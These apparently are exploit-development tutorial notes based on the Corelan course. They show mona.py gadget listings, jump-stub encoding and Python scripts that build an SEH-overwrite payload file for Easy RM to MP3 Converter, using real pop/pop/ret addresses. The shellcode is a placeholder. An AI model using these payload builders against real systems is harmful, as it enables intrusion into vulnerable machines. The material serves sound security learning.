027DC443 0x027dc443 (b+0x0007c443) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027DC48D 0x027dc48d (b+0x0007c48d) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027E0DBD 0x027e0dbd (b+0x00080dbd) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0287803D 0x0287803d (b+0x0011803d) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
029036DE 0x029036de (b+0x001a36de) : push esp # ret 0x08 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
028A02AF 0x028a02af (b+0x001402af) : push esp # ret 0x0c | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0126AAF1 0x0126aaf1 (b+0x0000aaf1) : push esp # ret 0x0c | {PAGE_EXECUTE_READ} [wmatimer.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v1.0.1.8 (C:\Program Files\Easy RM to MP3 Converter\wmatimer.dll)
772752B6 0x772752b6 (b+0x000252b6) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7600.16385 (C:\Windows\SYSTEM32\ntdll.dll)
027D6B5E 0x027d6b5e (b+0x00076b5e) : push esp # ret 0x04 | ascii {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027DB887 0x027db887 (b+0x0007b887) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
027DC0AD 0x027dc0ad (b+0x0007c0ad) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0281F115 0x0281f115 (b+0x000bf115) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0281F22F 0x0281f22f (b+0x000bf22f) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0286E7EF 0x0286e7ef (b+0x0010e7ef) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0289F796 0x0289f796 (b+0x0013f796) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
028EE4E0 0x028ee4e0 (b+0x0018e4e0) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
76A57ECC 0x76a57ecc (b+0x001d7ecc) : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [iertutil.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v8.00.7601.17514 (C:\Windows\system32\iertutil.dll)
027E88E7 0x027e88e7 (b+0x000888e7) : push esp # ret 0x10 | {PAGE_EXECUTE_READ} [MSRMCcodec02.dll] ASLR: False, Rebase: True, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll)
0BADF00D ... Please wait while I'm processing all remaining results and writing everything to file...
0BADF00D [+] Done. Only the first 20 pointers are shown here. For more pointers, open jmp.txt...
0BADF00D Found a total of 498 pointers
0BADF00D
0BADF00D [+] This mona.py action took 0:00:46.827000
Small buffers
When the buffer is too small for the shellcode but the shellcode can be stored elsewhere (e.g. somewhere reachable from another register), the small buffer can hold a short stub that jumps to the larger buffer. In the Corelan example the target is ESP+150, and the bytes between ESP+50 and ESP+150 must not be used. The following stub does the job:
- mov eax, esp
- add eax, 0x32 (adds 50 to EAX)
- add eax, 0x32 (adds 50 to EAX)
- add eax, 0x32 (adds 50 to EAX)
- jmp eax
0x32 is added three times rather than 150 once because an add with an 8-bit immediate (83 c0 32) contains no null byte, whereas add eax, 150 needs a 32-bit immediate (05 96 00 00 00). The Corelan example does add esp, 0x32 then jmp esp directly; that moves the stack pointer as well, so it is arguably better avoided.
Short Jumps
Sometimes a short jump of a few bytes is all that is needed. A short jump is encoded as:
- jmp 0x10 => 0xeb 0x10
where the second byte is a signed displacement counted from the end of the 2-byte instruction (0xeb 0x10 skips the 16 bytes that follow it; backward jumps use a negative two's-complement value).
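The two encodings above worked through in code, as an added example that comes neither from the Corelan course nor from the original page (Python 3; the helper names and the bad-character set \x00\x0d\x0a are this example's assumptions): it assembles the ESP+150 trampoline, shows the null bytes a single add eax, 150 would introduce, picks another step size when the remainder would itself be a bad character, and encodes/decodes EB rel8 short jumps including the backward case.

```python
import struct

BADCHARS = b"\x00\x0d\x0a"  # the bad characters used for the payload in Part 1


def has_badchars(code, badchars=BADCHARS):
    return any(b in badchars for b in code)


def add_eax_imm8(n):
    """add eax, imm8  ->  83 C0 ib. imm8 is sign-extended, so only -128..127 fits."""
    if not -128 <= n <= 127:
        raise ValueError("imm8 out of range: %d" % n)
    return b"\x83\xc0" + struct.pack("<b", n)


def add_eax_imm32(n):
    """add eax, imm32  ->  05 id. Small values are padded with 0x00, which is why the
    stub above adds 0x32 three times instead of 150 once."""
    return b"\x05" + struct.pack("<i", n)


def trampoline(distance, step=0x32, badchars=BADCHARS):
    """mov eax, esp ; add eax, step (repeated) ; jmp eax
    Lands on ESP+distance without moving ESP itself, using only imm8 encodings."""
    code = b"\x89\xe0"                     # mov eax, esp
    full, rest = divmod(distance, step)
    code += add_eax_imm8(step) * full
    if rest:
        code += add_eax_imm8(rest)         # e.g. distance 160 with step 0x32 -> add eax, 0x0a
    code += b"\xff\xe0"                    # jmp eax
    if has_badchars(code, badchars):
        raise ValueError("stub contains a bad character, pick another step")
    return code


def clean_trampoline(distance, steps=(0x32, 0x28, 0x20)):
    """Try candidate step sizes until the stub is free of bad characters."""
    for step in steps:
        try:
            return trampoline(distance, step)
        except ValueError:
            continue
    raise ValueError("no clean stub for distance %d" % distance)


def short_jmp(skip):
    """jmp short  ->  EB rel8. rel8 is counted from the end of this 2-byte instruction,
    so `skip` is the number of bytes jumped over (negative = backwards)."""
    if not -128 <= skip <= 127:
        raise ValueError("out of short-jump range, use E9 rel32")
    return b"\xeb" + struct.pack("<b", skip)


def short_jmp_target(code, at=0):
    """Offset (relative to code[0]) reached by the EB rel8 found at code[at]."""
    if code[at] != 0xEB:
        raise ValueError("no short jump at offset %d" % at)
    rel8 = struct.unpack("<b", code[at + 1:at + 2])[0]
    return at + 2 + rel8


if __name__ == "__main__":
    print(trampoline(150).hex())                    # 89e0 83c032 83c032 83c032 ffe0
    print(short_jmp(0x10).hex())                    # eb10
    # the nSEH slot used in Part 3: nop, jmp short +5, nop, then the 4-byte handler address
    print(short_jmp_target(b"\x90\xeb\x05\x90" + b"\x6e\xc8\x02\x48", at=1))  # 8
```

The stub is 13 bytes, which is the budget the small buffer must offer; if even that is too much, the mov can be dropped by using the add esp form the text mentions, at the cost of moving the stack pointer.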
Part 3: SEH Based exploits
Based on the third part of the Corelan exploit development course.
The overall layout of an SEH-based exploit is:
[JUNK][Short JMP ][Address to POP, POP, RET][NOPs][Shellcode]
[????][Address to next SEH][Address of SEH Handler ][???????????????]
A pattern is used to find the offset needed to overwrite the SEH handler address. On the crash, Immunity stops and waits for the exception to be passed to the program (SHIFT+F7/F8/F9). While stopped, the SEH chain can be inspected with ALT+S.
The handler address is then overwritten with the address of a POP, POP, RET sequence: when the handler is called, ESP+8 holds the address of the overwritten record (the next-SEH field), so two pops and a ret land on the 4 bytes just before the handler address, where the short jump sits. mona can find such sequences:
!mona seh -m strmdll.dll
The result:
0BADF00D [+] This mona.py action took 0:00:00
0BADF00D [+] Command used:
0BADF00D !mona seh -m strmdll.dll
---------- Mona command started on 2016-04-24 07:04:16 (v2.0, rev 566) ----------
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D - Only querying modules strmdll.dll
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Let's rock 'n roll.
0BADF00D [+] Querying 1 modules
0BADF00D - Querying module strmdll.dll
704D0000 Modules C:\Windows\system32\TAPI32.dll
0BADF00D [+] Setting pointer access level criteria to 'R', to increase search results
0BADF00D New pointer access level : R
0BADF00D [+] Preparing output file 'seh.txt'
0BADF00D - (Re)setting logfile seh.txt
0BADF00D [+] Writing results to seh.txt
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret 0x10' : 1
0BADF00D - Number of pointers of type 'pop esi # pop edi # ret ' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x0c' : 13
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x10' : 10
0BADF00D - Number of pointers of type 'pop eax # pop esi # ret ' : 7
0BADF00D - Number of pointers of type 'pop eax # pop ebp # ret 0x04' : 7
0BADF00D - Number of pointers of type 'pop eax # pop ebp # ret 0x08' : 4
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-0c]' : 6
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x0c' : 22
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x10' : 6
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret 0x10' : 1
0BADF00D - Number of pointers of type 'pop edi # pop esi # ret ' : 48
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x1C' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebx # ret ' : 24
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x1C' : 1
0BADF00D - Number of pointers of type 'pop ecx # pop esi # ret ' : 2
0BADF00D - Number of pointers of type 'pop edi # pop ebp # ret 0x08' : 3
0BADF00D - Number of pointers of type 'pop eax # pop ebp # ret 0x0c' : 2
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x08' : 41
0BADF00D - Number of pointers of type 'pop ebp # pop ebx # ret 0x0c' : 3
0BADF00D - Number of pointers of type 'pop ebx # pop ebp # ret 0x04' : 57
0BADF00D - Number of pointers of type 'pop edi # pop ebp # ret 0x04' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x04' : 128
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-04]' : 1
0BADF00D - Number of pointers of type 'pop esi # pop ebp # ret 0x08' : 49
0BADF00D - Number of pointers of type 'call dword ptr ss:[ebp-18]' : 1
0BADF00D [+] Results :
48035BC5 0x48035bc5 : pop esi # pop edi # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802C86E 0x4802c86e : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800564B 0x4800564b : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800699D 0x4800699d : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800DAB3 0x4800dab3 : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800DBAF 0x4800dbaf : pop esi # pop ebp # ret 0x0c | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48018C2F 0x48018c2f : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4801B752 0x4801b752 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48021FFA 0x48021ffa : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48022179 0x48022179 : pop esi # pop ebp # ret 0x0c | ascii {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48022478 0x48022478 : pop esi # pop ebp # ret 0x0c | ascii {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802B319 0x4802b319 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802D744 0x4802d744 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802FC91 0x4802fc91 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4802FEB2 0x4802feb2 : pop esi # pop ebp # ret 0x0c | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800C91B 0x4800c91b : pop ebx # pop ebp # ret 0x10 | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
4800DED4 0x4800ded4 : pop ebx # pop ebp # ret 0x10 | null {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
48021B81 0x48021b81 : pop ebx # pop ebp # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
480244D2 0x480244d2 : pop ebx # pop ebp # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
480263C6 0x480263c6 : pop ebx # pop ebp # ret 0x10 | {PAGE_EXECUTE_READ} [strmdll.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.1.00.3936 (C:\Windows\system32\strmdll.dll)
0BADF00D ... Please wait while I'm processing all remaining results and writing everything to file...
0BADF00D [+] Done. Only the first 20 pointers are shown here. For more pointers, open seh.txt...
0BADF00D Found a total of 440 pointers
0BADF00D
0BADF00D [+] This mona.py action took 0:00:01.622000
A short jump is then placed in the next-SEH slot, right before the handler address. The exploit takes the following form (offset is the distance to the handler slot found with the pattern; nop and buf are as in Part 1; 0x4802c86e is the pop esi # pop edi # ret from strmdll.dll above). The 0xeb 0x05 skips the trailing 0x90 and the 4-byte handler address and lands on the NOP sled:
content = "A"*(offset-4)+"\x90\xeb\x05\x90"+"\x6e\xc8\x02\x48"+nop*32+buf+nop*1000
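The SEH layout above as a builder, added here as an example rather than code from the page (Python 3; the offset of 1000 and the int3 placeholder shellcode are constructed values, the pop/pop/ret address is the strmdll.dll one from the mona output): it lays out the record, follows the pop/pop/ret back into the nSEH short jump to confirm it lands on the NOP sled, and lists any bad-character offsets before writing the file.

```python
import struct

# Constructed values for the demonstration: the real offset comes from the pattern, the
# pop/pop/ret address is the strmdll.dll one used above, and the shellcode is a stand-in
# (int3 breakpoints) for msfvenom output generated with EXITFUNC=seh.
OFFSET = 1000                  # distance to the SEH handler slot (constructed)
PPR = 0x4802c86e               # pop esi # pop edi # ret in strmdll.dll
SHELLCODE = b"\xcc" * 16       # placeholder, constructed
BADCHARS = b"\x00\x0d\x0a"


def p32(addr):
    """32-bit little-endian, the form an address takes inside the file."""
    return struct.pack("<I", addr)


def build_seh_payload(offset, ppr, shellcode, total=None, sled=32, nop=b"\x90"):
    """[junk][nSEH: nop, jmp short +5, nop][SEH: pop/pop/ret][NOP sled][shellcode][filler]
    The jmp skips the trailing nop and the 4-byte handler address and lands on the sled."""
    nseh = b"\x90\xeb\x05\x90"
    body = b"A" * (offset - 4) + nseh + p32(ppr) + nop * sled + shellcode
    if total is not None:
        if len(body) > total:
            raise ValueError("payload is %d bytes, larger than %d" % (len(body), total))
        body += nop * (total - len(body))
    return body


def seh_landing(payload, offset):
    """Walk the SEH dispatch on paper: the handler is called with ESP+8 pointing at the
    overwritten record, so pop/pop/ret returns into the nSEH slot at offset-4. Execute
    the nop there, decode the short jump and return the file offset execution reaches."""
    at = (offset - 4) + 1                   # skip the leading nop
    if payload[at] != 0xEB:
        raise ValueError("nSEH slot does not hold a short jump")
    rel8 = struct.unpack("<b", payload[at + 1:at + 2])[0]
    return at + 2 + rel8


def check_badchars(payload, badchars=BADCHARS):
    """File offsets of every bad character (empty list = clean)."""
    return [i for i, b in enumerate(payload) if b in badchars]


if __name__ == "__main__":
    content = build_seh_payload(OFFSET, PPR, SHELLCODE, total=OFFSET + 1100)
    assert seh_landing(content, OFFSET) == OFFSET + 4      # first byte of the NOP sled
    assert not check_badchars(content)
    with open("file.m3u", "wb") as f:
        f.write(content)
```

check_badchars is what catches a pop/pop/ret picked from the "null" rows of the mona listing: 0x4800564b, for instance, encodes as 4b 56 00 48 and puts a 0x00 in the handler slot, truncating the file at that point for a string-based parser.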
Payloads
When generating the payload with msfvenom, add the following option so that the exit technique matches the exception-handler context the shellcode runs in (the other values are process, thread and none):
EXITFUNC=SEH
Part 4: Speed Up Exploit Dev
Based on the fourth part of the Corelan course.
Note: the Corelan course presents tools for WinDBG. This wiki focuses on mona & Immunity.
Finding a pattern offset
mona can find the offset of a pattern value directly (and generate the pattern with pattern_create, alias pc):
!mona pattern_offset 43386F43
!mona po 43386F43
Part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
Based on the sixth part of the Corelan exploit development course.